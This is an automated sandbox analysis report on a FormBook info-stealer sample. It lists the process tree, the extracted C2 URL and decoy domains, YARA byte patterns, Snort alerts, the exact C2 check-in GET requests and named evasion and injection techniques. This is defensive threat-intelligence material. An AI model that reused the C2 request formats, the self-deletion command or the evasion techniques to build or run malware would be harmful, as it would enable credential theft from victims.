Loading ...

Play interactive tourEdit tour

Windows Analysis Report tgamf4XuLa

Overview

General Information

Sample Name:tgamf4XuLa (renamed file extension from none to exe)
Analysis ID:483617
MD5:f8146a71dedc3eeeaa1624d6832c39a4
SHA1:b1007a3beab21c77513bb9c4e6fc2a04c6346c04
SHA256:3611c1a2e9d1897825d5e7100a1c01d807f62a9c75d5f12602c168b0726d56ca
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • tgamf4XuLa.exe (PID: 6056 cmdline: 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F8146A71DEDC3EEEAA1624D6832C39A4)
    • schtasks.exe (PID: 5080 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • tgamf4XuLa.exe (PID: 1956 cmdline: C:\Users\user\Desktop\tgamf4XuLa.exe MD5: F8146A71DEDC3EEEAA1624D6832C39A4)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6428 cmdline: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dressmids.com/vuja/"], "decoy": ["maryjanearagon.com", "casualwearus.com", "thephonecasedepot.com", "twinpeaksyouthbasketball.com", "secure-filliale.com", "thecoastalhomeshop.com", "poloandaccessories.com", "thesouthernchildtn.com", "whereallroadslead.com", "harecase.com", "discomountainkombucha.com", "tjandamber.com", "yctyhb.com", "miccitypb.com", "niliana.com", "fraktal.media", "goodgrrrldesign.com", "tcheapvrwdshop.com", "orchid-nirvana2.homes", "mckinleyacreage.com", "3333tax.com", "florentinatravel.com", "ecorna.com", "bold2x.com", "syzhtr.com", "seifenliebe.info", "6144prestoncircle.com", "simmetrypcs.com", "bottomslum.com", "affordablejetski.net", "hellocharmaine.com", "jvfojqjr.icu", "colourfulcollective.travel", "life2you.com", "d0berman245.xyz", "realstylecelebz.com", "thisisalemon.com", "fizzandfun.com", "expertexceleratorchallenge.com", "twpjg.com", "testnora.com", "knothairbandsny.com", "racanelliestimating.com", "aryaanenterprises.com", "cherrybunk.life", "beard-fuel.com", "reebootwithjoe.com", "vip5-paizacasino.com", "nobelcafe.com", "saifreshmart.com", "astcvic.com", "noblehousekitchen.com", "facebooktransfer.com", "humanareachreards.com", "parttimesneakerhead.com", "geliboluwebtasarim.com", "ripvangordo.com", "hitcitybaseball.net", "hostingfun.net", "gfd.xyz", "gighomesale.com", "allthatrom.com", "allenleather.com", "officallive33.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x4695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x4797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x33fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xa82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x66b9:$sqlite3step: 68 34 1C 7B E1
    • 0x67cc:$sqlite3step: 68 34 1C 7B E1
    • 0x66e8:$sqlite3text: 68 38 2A 90 C5
    • 0x680d:$sqlite3text: 68 38 2A 90 C5
    • 0x66fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6823:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.tgamf4XuLa.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.tgamf4XuLa.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.tgamf4XuLa.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        6.2.tgamf4XuLa.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.tgamf4XuLa.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.dressmids.com/vuja/"], "decoy": ["maryjanearagon.com", "casualwearus.com", "thephonecasedepot.com", "twinpeaksyouthbasketball.com", "secure-filliale.com", "thecoastalhomeshop.com", "poloandaccessories.com", "thesouthernchildtn.com", "whereallroadslead.com", "harecase.com", "discomountainkombucha.com", "tjandamber.com", "yctyhb.com", "miccitypb.com", "niliana.com", "fraktal.media", "goodgrrrldesign.com", "tcheapvrwdshop.com", "orchid-nirvana2.homes", "mckinleyacreage.com", "3333tax.com", "florentinatravel.com", "ecorna.com", "bold2x.com", "syzhtr.com", "seifenliebe.info", "6144prestoncircle.com", "simmetrypcs.com", "bottomslum.com", "affordablejetski.net", "hellocharmaine.com", "jvfojqjr.icu", "colourfulcollective.travel", "life2you.com", "d0berman245.xyz", "realstylecelebz.com", "thisisalemon.com", "fizzandfun.com", "expertexceleratorchallenge.com", "twpjg.com", "testnora.com", "knothairbandsny.com", "racanelliestimating.com", "aryaanenterprises.com", "cherrybunk.life", "beard-fuel.com", "reebootwithjoe.com", "vip5-paizacasino.com", "nobelcafe.com", "saifreshmart.com", "astcvic.com", "noblehousekitchen.com", "facebooktransfer.com", "humanareachreards.com", "parttimesneakerhead.com", "geliboluwebtasarim.com", "ripvangordo.com", "hitcitybaseball.net", "hostingfun.net", "gfd.xyz", "gighomesale.com", "allthatrom.com", "allenleather.com", "officallive33.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: tgamf4XuLa.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\HpnpObXJP.exeJoe Sandbox ML: detected
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: tgamf4XuLa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: tgamf4XuLa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: control.pdb source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exeDomain query: www.tjandamber.com
          Source: C:\Windows\explorer.exeDomain query: www.fraktal.media
          Source: C:\Windows\explorer.exeDomain query: www.expertexceleratorchallenge.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.25.92.0 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeDomain query: www.d0berman245.xyz
          Source: C:\Windows\explorer.exeDomain query: www.cherrybunk.life
          Source: C:\Windows\explorer.exeDomain query: www.hellocharmaine.com
          Source: C:\Windows\explorer.exeDomain query: www.syzhtr.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.72.144.19 80
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.d0berman245.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.dressmids.com/vuja/
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1Host: www.cherrybunk.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.d0berman245.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1Host: www.fraktal.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.expertexceleratorchallenge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1Host: www.hellocharmaine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.syzhtr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1Host: www.tjandamber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1Host: www.realstylecelebz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.dressmids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1Host: www.discomountainkombucha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Sep 2021 08:10:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
          Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
          Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/
          Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/modall.php
          Source: unknownDNS traffic detected: queries for: www.cherrybunk.life
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1Host: www.cherrybunk.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.d0berman245.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1Host: www.fraktal.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.expertexceleratorchallenge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1Host: www.hellocharmaine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.syzhtr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1Host: www.tjandamber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1Host: www.realstylecelebz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.dressmids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1Host: www.discomountainkombucha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
